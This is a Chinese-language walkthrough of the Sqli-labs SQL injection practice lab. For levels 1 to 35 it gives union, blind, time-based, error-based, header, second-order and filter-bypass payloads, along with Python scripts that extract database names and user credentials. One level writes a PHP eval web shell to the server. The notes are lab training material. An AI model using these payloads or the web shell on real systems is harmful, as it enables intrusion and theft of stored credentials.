Sqli-labs通关笔记

Less-1

• 字符型注入

• '报错

• ?id=-1' order by 4%23 报错

• ?id=-1' union select 1,database(),3 %23

• ?id=-1%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23

• ?id=-1%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23

• ?id=-1%27 union select 1,group_concat(username,0x3a,password),3 from users %23

Less-2

• 数字型注入

• '报错

• ?id=0 order by 4 报错

• 同上…

Less-3

• ‘报错信息： You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'') LIMIT 0,1' at line 1
• 推测sql语句：select * from users where id=('id') LIMIT 0,1;
• ?id=-1%27) order by 4%23
• 同上…

Less-4

• '未报错，"报错信息： You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-1"") LIMIT 0,1' at line 1
• 推测sql语句：select * from users where id = ("id") LIMIT 0,1;
• ?id=-1") order by 4%23
• 同上…

Less-5

报错

• 郁离歌

盲注

• '出现报错，正确时you are in

• ?id=1%27 and length(database())>8%23 判断数据库长度

• ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100%23 逐位得到库名

• py脚本如下：

  Code

  import requests
  database = ''
  url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and ascii(substr((select database()),{times},1)) > {num}%23'
  for times in range(1,9):
      for num in range(ord('a'),ord('z')+1):
          content = requests.get(url.format(times=times,num=num)).text
          if 'You' not in content:
              database += chr(num)
              print (database)
              break
  print (database)

• ?id=1%27 and (select length(group_concat(table_name)) from information_schema.tables where table_schema=%27security%27)>28 %23 判断所有表长度

• ?id=1%27 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=%27security%27),1,1))>100 %23 逐位得到表名

• py脚本如下：

  Code

  import requests
  tables = ''
  url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),{times},1))%3E{num}%23'
  nums = [n for n in range(ord('a'),ord('z')+1)]
  nums.insert(0,ord(','))
  for times in range(1,30):
      for num in nums:
          content = requests.get(url.format(times=times,num=num)).text
          if 'You' not in content:
              tables += chr(num)
              print (tables)
              break
  print (tables)

• id=1%27 and (select length(group_concat(column_name)) from information_schema.columns where table_name=%27users%27)> 20%23 判断列长度

• ?id=1%27 and ascii(substr((select length(group_concat(column_name)) from information_schema.columns where table_name=%27users%27),1,1))>20 %23逐位得到字段

• py脚本如下：

  Code

  import requests
  columns = ''
  url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27 and table_schema=%27security%27),{times},1))%3E{num} %23'
  nums = [n for n in range(ord('a'),ord('z')+1)]
  nums.insert(0,ord(','))
  for times in range(1,95):
      for num in nums:
          content = requests.get(url.format(times=times,num=num)).text
          if 'You' not in content:
              columns += chr(num)
              print (columns)
              break
  print (columns)

• ?id=1%27 and (select length(group_concat(username,password)) from users)> 100%23 判断内容长度

• ?id=1%27 and ascii(substr((select group_concat(username,0x3a,password) from users),1,1))> 67%23 逐位得到内容

• py脚本如下：

  Code

  import requests
  columns = ''
  url = 'http://192.168.35.128/sql/Less-5/?id=1%27%20and%20ascii(substr((select%20group_concat(concat_ws(":",username,password))%20from%20users),{times},1))%3E{num} %23'
  nums = [n for n in range(ord('A'),ord('z')+1)]
  nums.insert(0,ord(','))
  for times in range(1,95):
      for num in nums:
          content = requests.get(url.format(times=times,num=num)).text
          if 'You' not in content:
              columns += chr(num)
              print (columns)
              break
  print (columns)

Less-6

• ?id=1%22%23 同Less-5，把'替换为"

Less-7

• /Less-2/?id=0 union select 1,@@datadir,@@basedir MYSQL%23 得到绝对路径
• 1'))UNION SELECT 1,2,'<?php @eval($_post[“1”])?>' into outfile "c:\\phpstudy\\www\\sql\\Less-7\\1.php"%23

Less-8

• 同Less-5 bool盲注

Less-9

• 1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))# 延迟注入
• py脚本如下：
  Code

  import requests
  import time
  url = "http://192.168.35.128/sql/Less-9/?id=1' and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
  db_name = ''
  for num in range(1,9):
      for asc in range(ord('a'),ord('z')+1):
          s_time = time.time()
          requests.get(url.format(num=num,asc=asc))
          e_time = time.time()
          if (e_time-s_time) > 3:
              db_name += chr(asc)
              print (db_name)
              break

Less-10

• 1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))#
• 同Less-9

Less-11

• uname=1%27 order by 3#&passwd=1 报错
• uname=1%27 union select 1,database()#&passwd=1

Less-12

• uname=1%22) union select 1,database()#&passwd=1
• 同Less-11

Less-13

• uname=1%27&passwd=1报错信息：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1
• uname=1%27) and updatexml(1,concat(0x7e,(select database()),0x7e),1)# &passwd=1
• uname=1%27) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),0x7e),1)# &passwd=1

Less-14

• '为"
• 同Less-13

Less-15

• uname=admin'andIf(ascii(substr(database(),1,1))=115,sleep(2),1)#&passwd=1 延迟注入

Less-16

• 闭合")
• 同Less-15

Less-17

• passwd注入
• 采用报错注入或盲注

Less-18

• 源码为$insert="INSERT INTOsecurity.uagents(uagent,ip_address,username) VALUES ('$uagent', '$IP', $uname)";
• 在ua处注入
• 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1' = '1

Less-19

• 同Less-18，在referer处注入

Less-20

• 同Less-18，在cookie处注入

Less-21

• ') union select 1,database(),6 or 1=1 # base64编码

Less-22

• 同Less-21，'替换为" base64编码

Less-23

• #和--过滤，采用and '1'='1闭合
• payload0' union select 1,database(),3 and '1'='1

Less-24

• 二次注入
• payload admin'#修改admin密码

Less-25

• payload ' union select 1,database(),3#

Less-25a

• payload0 union select 1,database(),3#

Less-26

• 空格绕过%20 %09 %0a %0b %0c %0d %a0
• payload0'%a0union%a0select%a01,database(),3%26%26%a0'1

Less-26a

• 过滤or，and ， /* , – , # , 空格 , /
• payload0')%a0union%a0select%a01,version(),database()%26%26%a0('1

Less-27

• 过滤union，select
• 0'%a0UNIoN%A0SeLecT%a01,database(),3%26%26%a0'1
• 0'%a0UNIoN%A0SeLecT%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0'1
• 0'%a0UNIoN%a0SeLecT%a01,group_concat(username,password),3%a0from%a0security%2Eusers%a0where%a01%26%26%a0'1

Less-27a

• payload0"%a0UNIoN%a0SeLecT%a01,version(),database()%26%26%a0"1
• 同Less-27

Less-28

• 过滤union select
• 0')%a0UNIoN%A0SeLecT(1),version(),database()%26%26%a0('1

Less-28a

• 0') UNIon%A0SeLecT 1,version(),database()--+

Less-29

解

• 利用tomcat与apache解析相同请求参数不同的特性，tomcat解析相同请求参数取第一个，而apache取第二个，如?id=1&id=2，tomcat取1，apache取2。
• 客户端的请求首先经过tomcat服务器,tomcat会解析第一个参数,接下来tomcat去请求apache服务器,而apache会解析最后一个参数,那么最终返回的肯定是apache处理的数据。因为在实际情况中,如果配置两层服务器的情况,往往我们会在第一台服务器做数据处理和过滤,其功能类似于一个waf。而正是因为前后两层服务器对参数解析的不同,我们就可使用HPP(参数污染)攻击,该攻击会对服务器和客户端造成威胁`
• payload?id=1&id=0' union select 1,group_concat(schema_name),2 from information_schema.schemata%23

参考链接

• p0rz9

Less-30

• 同Less-29,'替换"

Less-31

• 同Less-29,'替换")

Less-32

• 宽字节注入
• payload?id=0%df' union select 1,group_concat(schema_name),2 from information_schema.schemata%23

Less-33

• 调用了PHP 的addslashes()函数，addslashes(string)函数返回在预定义字符之前添加反斜杠\的字符串。
• 同Less-32

Less-34

• 同Less-32
• payloaduname=admin%df' union select database(),2#&passwd=1

Less-35

• '报错use near '\' LIMIT 0,1' at line 1，不需要闭合
• payload?id=-1 union select 1,2,database()%23